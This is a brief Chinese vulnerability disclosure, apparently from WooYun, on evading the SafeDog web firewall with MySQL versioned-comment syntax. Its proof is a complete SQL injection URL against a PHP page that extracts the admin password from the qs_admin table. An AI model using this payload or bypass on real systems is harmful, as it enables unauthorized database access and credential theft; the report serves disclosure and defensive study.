### 简要描述:
嘿嘿
### 详细说明:
之前http://www.wooyun.org/bugs/wooyun-2014-089487/trace/ca338e20666fbe79e87f32643c939075
通过id=8.0union select ...和id=8E0union select ...可绕过安全狗进行注入
然后这次是/*!50000SeLect*/这种姿势
### 漏洞证明:
获取管理员的pwd为例,没有任何提示
http://localhost/74/wap/wap-company-show.php?id=-1%20union+/*!50000SeLect*/1,2,3,pwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#
[<img src="https://images.seebug.org/upload/201412/31124053caec74eb3e7fa14eda80cdf5a4d53228.jpg" alt="yyyy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31124053caec74eb3e7fa14eda80cdf5a4d53228.jpg)
暂无评论